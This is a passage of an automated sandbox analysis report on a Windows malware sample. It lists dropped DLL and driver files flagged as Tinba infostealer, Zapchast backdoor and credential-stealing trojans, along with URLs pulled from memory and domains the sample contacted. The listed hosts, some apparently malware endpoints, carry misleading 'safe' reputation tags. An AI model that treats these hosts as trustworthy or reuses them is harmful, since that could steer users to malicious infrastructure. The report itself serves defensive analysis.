          C:\Users\user\Desktop\EEC3DA20E\C1CE322\DE840zzuv.dll100%Joe Sandbox ML
          C:\Windows\SysWOW64\2865ivSJ0.sys100%Joe Sandbox ML
          C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A90B6898\5B7DOONHA.dll100%Joe Sandbox ML
          C:\Users\user\Desktop\EEC3DA20E\E2416B28\38902yywx.dll100%Joe Sandbox ML
          C:\Users\user\Desktop\EEC3DA20E\FFA96FF9\FB97GB461.dll100%Joe Sandbox ML
          C:\Windows\SysWOW64\BC66DPQaf.sys100%Joe Sandbox ML
          C:\Program Files (x86)\Java\DC1FFAF.exe13%ReversingLabs
          C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A90B6898\586030GBC.dll67%ReversingLabsWin32.Trojan.Generic
          C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A90B6898\5B7DOONHA.dll67%ReversingLabsWin32.Trojan.Generic
          C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A9F7A9DD\A815rppmj.dll7%ReversingLabs
          C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\B671819D97E4\84AEHJG8C.dll0%ReversingLabs
          C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\C5639556181\7488JGDAA.exe24%ReversingLabs
          C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\CA229129\1F0xyrmp.dll39%ReversingLabsWin32.Infostealer.Tinba
          C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\CA229129\42EEXUWWZ.dll39%ReversingLabsWin32.Infostealer.Tinba
          C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\DB37C1B99\BD950wrst.dll61%ReversingLabsWin32.PUA.Presenoker
          C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\DC9B0A72\DE3EC8324.dll11%ReversingLabs
          C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\E71620\712EVTPSM.dll5%ReversingLabs
          C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\F03D5C\9605A212x.dll0%ReversingLabs
          C:\Users\user\Desktop\EEC3DA20E\B5155CBEC4E\51D610yws.dll0%ReversingLabs
          C:\Users\user\Desktop\EEC3DA20E\C1CE322\DE840zzuv.dll78%ReversingLabsWin32.Backdoor.Zapchast
          C:\Users\user\Desktop\EEC3DA20E\CDC745\17B0883wr.dll0%ReversingLabs
          C:\Users\user\Desktop\EEC3DA20E\CFDEE45078\C2B2CFEA7.dll85%ReversingLabsWin32.Trojan.CredentialAccess
          C:\Users\user\Desktop\EEC3DA20E\E2416B28\38902yywx.dll54%ReversingLabsWin32.Trojan.Tnega
          C:\Users\user\Desktop\EEC3DA20E\EC4D54E4D0\338Atwspn.dll0%ReversingLabs
          C:\Users\user\Desktop\EEC3DA20E\FFA96FF9\FB97GB461.dll78%ReversingLabsWin32.Backdoor.Zapchast
          C:\Windows\SysWOW64\A16652yzz.sys83%ReversingLabsWin64.Infostealer.Tinba

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
          http://vip.baxingfz.com/y0%Avira URL Cloudsafe
          http://plugin1.config.hyocr.com:8080/apisvrs.php;http://plugin2.config.hyocr.com:8080/apisvrs.phpupl0%Avira URL Cloudsafe
          http://www.mockplus.cn/0%Avira URL Cloudsafe
          http://www.baxingfz.com/0%Avira URL Cloudsafe
          http://www.duote.com/0%Avira URL Cloudsafe
          http://588ku.com/0%Avira URL Cloudsafe
          http://vip.baxingfz.com/i0%Avira URL Cloudsafe
          http://time-time-dbvpvdlnog.cn-chengdu.fcapp.run0%Avira URL Cloudsafe
          http://sinacloud.net/operate/tj0%Avira URL Cloudsafe
          http://www.baxingfz.com10%Avira URL Cloudsafe
          http://iwencai.com/0%Avira URL Cloudsafe
          http://www.yunzhijia.com/0%Avira URL Cloudsafe
          http://www.juming.com/0%Avira URL Cloudsafe
          http://www.jianguoyun.com/0%Avira URL Cloudsafe
          http://www.kamizj.com/liebiao/F70C5F7D4E034D38X0%Avira URL Cloudsafe
          http://qingdaocs.oss-accelerate.aliyuncs.com/0%Avira URL Cloudsafe
          http://wulancabucs.oss-accelerate.aliyuncs.com/0%Avira URL Cloudsafe
          http://www.kamizj.com/liebiao/F70C5F7D4E034D38P0%Avira URL Cloudsafe
          http://www.kamizj.com/liebiao/F70C5F7D4E034D38O0%Avira URL Cloudsafe
          http://www.sina.com.cn/0%Avira URL Cloudsafe
          http://www.winshang.com/0%Avira URL Cloudsafe
          http://zhangjiakoucs.oss-accelerate.aliyuncs.com/2024-08-06/16_270%Avira URL Cloudsafe
          http://vip.baxingfz.com/C:0%Avira URL Cloudsafe
          http://www.ksfm2.com0%Avira URL Cloudsafe
          http://www.kuaishou.com/0%Avira URL Cloudsafe
          http://www.ems.com.cn/0%Avira URL Cloudsafe
          http://www.qiniu.com/0%Avira URL Cloudsafe
          http://yanzheng.appchizi.com/0%Avira URL Cloudsafe
          http://www.pcauto.com.cn/0%Avira URL Cloudsafe
          http://w7000.com/0%Avira URL Cloudsafe
          http://vip.baxingfz.com/)0%Avira URL Cloudsafe
          http://1066951243755853.cn-huhehaote.fc.aliyuncs.com/2016-08-15/proxy/time.LATEST/time/0%Avira URL Cloudsafe
          http://www.douyin.com/0%Avira URL Cloudsafe
          http://115.28.91.235/api/fun.aspxnameo0%Avira URL Cloudsafe
          http://yanzheng.appchizi.com/kss_io/io.php?v=13&b=1&s=10000002&e=get&line=10%Avira URL Cloudsafe
          http://vip.baxingfz.com/AR0%Avira URL Cloudsafe
          http://ip.qq.com/v1-dll-api.jsdama.com0%Avira URL Cloudsafe
          https://www.96ydw.com/liebiao/88F410287F3C5C1As1d0%Avira URL Cloudsafe
          http://crl.ver)0%Avira URL Cloudsafe
          http://soso.com/0%Avira URL Cloudsafe
          http://www.jb51.net/0%Avira URL Cloudsafe
          http://xianggangcs.oss-accelerate.aliyuncs.com/0%Avira URL Cloudsafe
          http://foodmate.net/0%Avira URL Cloudsafe
          http://www.kanzhun.com/0%Avira URL Cloudsafe
          http://www.ih5.cn/0%Avira URL Cloudsafe
          http://www.ichuanglan.com/0%Avira URL Cloudsafe
          http://vip.baxingfz.com//0%Avira URL Cloudsafe
          http://www.GeeM2.com0%Avira URL Cloudsafe
          http://www.netease.com/0%Avira URL Cloudsafe
          http://www.hichina.com/0%Avira URL Cloudsafe
          http://huadongcs.oss-accelerate.aliyuncs.com/0%Avira URL Cloudsafe
          http://www.Haom6.comhttp://www.GeeM2.comWemade0%Avira URL Cloudsafe
          http://yanzheng.appchizi.com/kss_io/io.php?v=13&b=1&s=10000002&e=get&line=1J0%Avira URL Cloudsafe
          http://www.solidot.org/0%Avira URL Cloudsafe
          http://www.sohu.com/0%Avira URL Cloudsafe
          http://vip.baxingfz.com/lll0%Avira URL Cloudsafe
          http://www.1688.com/0%Avira URL Cloudsafe
          http://vip.baxingfz.com/http://baxing.1Rememberaccountusernameconfigpasswordclientidrandomstrwebdata0%Avira URL Cloudsafe
          http://www.m6dlq.com/0%Avira URL Cloudsafe
          http://www.huawei.com/0%Avira URL Cloudsafe
          https://8090cqfz-1251514656.file.myqcloud.com/baxing.htm$0%Avira URL Cloudsafe
          http://yanzheng.appchizi.com/kss_io/io.php?v=13&b=1&s=10000002)u60%Avira URL Cloudsafe
          http://www.youth.cn/0%Avira URL Cloudsafe
          http://119.29.29.29/d?dn=0%Avira URL Cloudsafe
          http://www.GameM2.com0%Avira URL Cloudsafe
          http://www.yidianzixun.com/0%Avira URL Cloudsafe
          https://8090cqfz-1251514656.file.myqcloud.com/baxing.htmU0%Avira URL Cloudsafe
          http://www.xunlei.com/0%Avira URL Cloudsafe
          http://www.imiker.com/0%Avira URL Cloudsafe
          https://www.96ydw.com/liebiao/88F410287F3C5C1A;fg0%Avira URL Cloudsafe
          http://ca800.com/0%Avira URL Cloudsafe
          http://www.jmw.com.cn/0%Avira URL Cloudsafe
          http://shanghaics.oss-accelerate.aliyuncs.com/0%Avira URL Cloudsafe
          http://www.bootcss.com/0%Avira URL Cloudsafe
          http://vip.baxingfz.com/.e0%Avira URL Cloudsafe
          http://www.ctrip.com/0%Avira URL Cloudsafe
          http://www.xitongzhijia.net/0%Avira URL Cloudsafe
          http://xinics.oss-accelerate.aliyuncs.com/0%Avira URL Cloudsafe
          http://www.eyuyan.com0%Avira URL Cloudsafe
          https://8090cqfz-1251514656.file.myqcloud.com/baxing.htmR0%Avira URL Cloudsafe
          http://plugin1.config.hyocr.com:8080/apisvrs.php;http://plugin2.config.hyocr.com:8080/apisvrs.php0%Avira URL Cloudsafe
          http://www.7k7k.com/0%Avira URL Cloudsafe
          http://www.jdwx.info/0%Avira URL Cloudsafe
          http://vip.baxingfz.com/.l0%Avira URL Cloudsafe
          http://www.yiche.com/0%Avira URL Cloudsafe
          http://115.28.91.235/api/fun.aspxname3j0%Avira URL Cloudsafe
          http://aq.cqyanzheng.com/0%Avira URL Cloudsafe
          http://cs-g2-crl.thawte.com/ThawteCSG2.crl00%Avira URL Cloudsafe
          http://lusongsong.com/0%Avira URL Cloudsafe
          http://www.baxingfz.com0%Avira URL Cloudsafe
          https://8090cqfz-1251514656.file.myqcloud.com/baxing.htmt0%Avira URL Cloudsafe
          http://www.i4.cn/0%Avira URL Cloudsafe
          http://www.m6dlq.com/PEC20%Avira URL Cloudsafe
          http://www.ipo.hk/0%Avira URL Cloudsafe
          http://xiaoman.cn/0%Avira URL Cloudsafe
          https://8090cqfz-1251514656.file.myqcloud.com/baxing.htmm0%Avira URL Cloudsafe
          http://zhangjiakoucs.oss-accelerate.aliyuncs.com/0%Avira URL Cloudsafe
          http://dcloud.net.cn/0%Avira URL Cloudsafe
          http://8.218.87.7/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.douyin.com.queniuyk.com
          		163.181.160.235
          		truefalse
            		unknown
            www.jmw.com.cn
            		47.94.225.221
            		truefalse
              		unknown
              so.seos-lb.com
              		104.192.110.226
              		truefalse
                		unknown
                multi-az-www-api.kuaishou.com
                		103.107.217.26
                		truefalse
                  		unknown
                  eu-central-1-ds-2085.oss-acc.aliyuncs.com
                  		47.254.187.183
                  		truefalse
                    		unknown
                    g8450a5.usallient81.jiasula.vip
                    		45.194.34.250
                    		truefalse
                      		unknown
                      qt0t6l4k.e0.sched.ovscdns.com
                      		43.159.71.118
                      		truefalse
                        		unknown
                        youdao.com
                        		111.124.200.101
                        		truefalse
                          		unknown
                          www.wshifen.com
                          		103.235.46.96
                          		truefalse
                            		unknown
                            ap-southeast-1-ds-2085.oss-acc.aliyuncs.com
                            		161.117.242.89
                            		truefalse
                              		unknown
                              www.cctv.com.wsglb0.com
                              		163.171.208.133
                              		truefalse
                                		unknown
                                www.sogou.com
                                		119.28.109.132
                                		truefalse
                                  		unknown
                                  sh2.general.proxy.sogou.com
                                  		49.51.65.181
                                  		truefalse
                                    		unknown
                                    ww1.sinaimg.cn.w.alikunlun.com
                                    		163.181.42.245
                                    		truefalse
                                      		unknown
                                      opencdnka.jomodns.com
                                      		113.219.142.35
                                      		truefalse
                                        		unknown
                                        bxjbqj09.e0.sched.ovscdns.com
                                        		43.159.71.118
                                        		truefalse
                                          		unknown
                                          www.1688.com.danuoyi.tbcache.com
                                          		163.181.199.199
                                          		truefalse
                                            		unknown
                                            www.tencent.com.acc.edgeonedy1.com
                                            		43.159.118.238
                                            		truefalse
                                              		unknown
                                              sinacloud.net
                                              		27.221.16.179
                                              		truefalse
                                                		unknown
                                                foodmate.net
                                                		120.26.110.170
                                                		truefalse
                                                  		unknown
                                                  www.eastmoney.com.w.cdngslb.com
                                                  		163.181.92.231
                                                  		truefalse
                                                    		unknown
                                                    www.qq.com.eo.dnse2.com
                                                    		43.152.186.103
                                                    		truefalse
                                                      		unknown
                                                      hao123.n.shifen.com
                                                      		103.235.46.98
                                                      		truefalse
                                                        		unknown
                                                        opencdnqczjv6.jomodns.com
                                                        		60.221.222.1
                                                        		truefalse
                                                          		unknown
                                                          ap-southeast-1-ds-2089.oss-acc.aliyuncs.com
                                                          		161.117.242.93
                                                          		truefalse
                                                            		unknown
                                                            eu-central-1-ds-2089.oss-acc.aliyuncs.com
                                                            		47.254.187.187
                                                            		truefalse
                                                              		unknown
                                                              vip.baxingfz.com
                                                              		43.154.89.236
                                                              		truefalse
                                                                		unknown
                                                                dc3ee476.ovslegodl-dk.sched.ovscdns.com
                                                                		43.132.81.173
                                                                		truefalse
                                                                  		unknown
                                                                  jd-abroad.cdn20.com
                                                                  		163.171.132.119
                                                                  		truefalse
                                                                    		unknown
                                                                    www.tencent.com
                                                                    		unknown
                                                                    		unknownfalse
                                                                      		unknown
                                                                      www.zhihu.com
                                                                      		unknown
                                                                      		unknownfalse
                                                                        		unknown
                                                                        www.qq.com
                                                                        		unknown
                                                                        		unknownfalse
                                                                          		unknown
                                                                          www.so.com
                                                                          		unknown
                                                                          		unknownfalse
                                                                            		unknown
                                                                            www.douyin.com
                                                                            		unknown
                                                                            		unknownfalse
                                                                              		unknown
                                                                              www.baidu.com
                                                                              		unknown
                                                                              		unknownfalse
                                                                                		unknown
                                                                                www.jb51.net
                                                                                		unknown
                                                                                		unknownfalse
                                                                                  		unknown
                                                                                  www.1688.com
                                                                                  		unknown
                                                                                  		unknownfalse
                                                                                    		unknown
                                                                                    www.cctv.com
                                                                                    		unknown
                                                                                    		unknownfalse
                                                                                      		unknown
                                                                                      zhangjiakoucs.oss-accelerate.aliyuncs.com
                                                                                      		unknown
                                                                                      		unknownfalse
                                                                                        		unknown
                                                                                        soso.com
                                                                                        		unknown
                                                                                        		unknownfalse
                                                                                          		unknown
                                                                                          www.autohome.com.cn
                                                                                          		unknown
                                                                                          		unknownfalse
                                                                                            		unknown
                                                                                            www.kuaishou.com
                                                                                            		unknown
                                                                                            		unknownfalse
                                                                                              		unknown
                                                                                              www.cdstm.cn
                                                                                              		unknown
                                                                                              		unknownfalse
                                                                                                		unknown
                                                                                                xianggangcs.oss-accelerate.aliyuncs.com
                                                                                                		unknown
                                                                                                		unknownfalse
                                                                                                  		unknown
                                                                                                  www.jd.com
                                                                                                  		unknown
                                                                                                  		unknownfalse
                                                                                                    		unknown
                                                                                                    www.eastmoney.com
                                                                                                    		unknown
                                                                                                    		unknownfalse
                                                                                                      		unknown
                                                                                                      www.hupu.com
                                                                                                      		unknown
                                                                                                      		unknownfalse
                                                                                                        		unknown
                                                                                                        www.iqiyi.com
                                                                                                        		unknown
                                                                                                        		unknownfalse
                                                                                                          		unknown
                                                                                                          www.sina.com.cn
                                                                                                          		unknown
                                                                                                          		unknownfalse
                                                                                                            		unknown
                                                                                                            www.hao123.com
                                                                                                            		unknown
                                                                                                            		unknownfalse
                                                                                                              		unknown
                                                                                                              www.sohu.com
                                                                                                              		unknown
                                                                                                              		unknownfalse
                                                                                                                		unknown

                                                                                                                Contacted URLs

                                                                                                                NameMaliciousAntivirus DetectionReputation
                                                                                                                http://www.sina.com.cn/false
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://zhangjiakoucs.oss-accelerate.aliyuncs.com/2024-08-06/16_27false
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.kuaishou.com/false
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.douyin.com/false
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://soso.com/false
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://foodmate.net/false
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.jb51.net/false
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.sohu.com/false
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.1688.com/false
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.jmw.com.cn/false
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown

                                                                                                                URLs from Memory and Binaries

                                                                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                http://sinacloud.net/operate/tjDC1FFAF.exe, 00000002.00000002.4679992769.000000000647A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.mockplus.cn/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.duote.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://vip.baxingfz.com/iDC1FFAF.exe, 00000002.00000003.2241872766.0000000007746000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4686679559.0000000007746000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://588ku.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.baxingfz.com/DC1FFAF.exe, 00000002.00000002.4718677174.00000000104C8000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4718677174.00000000104EE000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://deff.nelreports.net/api/report?cat=msnDC1FFAF.exe, 00000002.00000002.4675493919.0000000003EEF000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2211747868.0000000006513000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4680189506.0000000006510000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4686679559.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2216473629.0000000006513000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://vip.baxingfz.com/yDC1FFAF.exe, 00000002.00000003.2241872766.0000000007746000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4686679559.0000000007746000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://time-time-dbvpvdlnog.cn-chengdu.fcapp.run1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.baxingfz.com1DC1FFAF.exe, 00000002.00000002.4718677174.00000000104EE000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2240330282.00000000104EE000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2241233197.00000000104F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://plugin1.config.hyocr.com:8080/apisvrs.php;http://plugin2.config.hyocr.com:8080/apisvrs.phpupl712EVTPSM.dll.2.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.yunzhijia.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://iwencai.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.kamizj.com/liebiao/F70C5F7D4E034D38XDC1FFAF.exe, 00000002.00000002.4686679559.00000000077A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.juming.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://wulancabucs.oss-accelerate.aliyuncs.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.jianguoyun.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.kamizj.com/liebiao/F70C5F7D4E034D38PDC1FFAF.exe, 00000002.00000002.4718677174.000000001057E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://qingdaocs.oss-accelerate.aliyuncs.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.kamizj.com/liebiao/F70C5F7D4E034D38ODC1FFAF.exe, 00000002.00000002.4686679559.00000000076E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.winshang.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://vip.baxingfz.com/C:DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E42000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.ksfm2.comDC1FFAF.exe, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://yanzheng.appchizi.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.qiniu.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.ems.com.cn/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.pcauto.com.cn/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://vip.baxingfz.com/)DC1FFAF.exe, 00000002.00000003.2241872766.0000000007746000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://w7000.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://yanzheng.appchizi.com/kss_io/io.php?v=13&b=1&s=10000002&e=get&line=1DC1FFAF.exe, 00000002.00000002.4680189506.000000000651C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://vip.baxingfz.com/ARDC1FFAF.exe, 00000002.00000002.4683117572.000000000711C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://1066951243755853.cn-huhehaote.fc.aliyuncs.com/2016-08-15/proxy/time.LATEST/time/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://115.28.91.235/api/fun.aspxnameoDC1FFAF.exe, 00000002.00000002.4748506643.000000001173E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://ip.qq.com/v1-dll-api.jsdama.comDC1FFAF.exe, 00000002.00000003.2195942618.0000000006540000.00000004.00000020.00020000.00000000.sdmp, 9605A212x.dll.2.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://www.96ydw.com/liebiao/88F410287F3C5C1As1dDC1FFAF.exe, 00000002.00000002.4718677174.000000001057E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://crl.ver)svchost.exe, 00000004.00000002.3819673759.000001BC6A00F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://xianggangcs.oss-accelerate.aliyuncs.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.kanzhun.com/1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
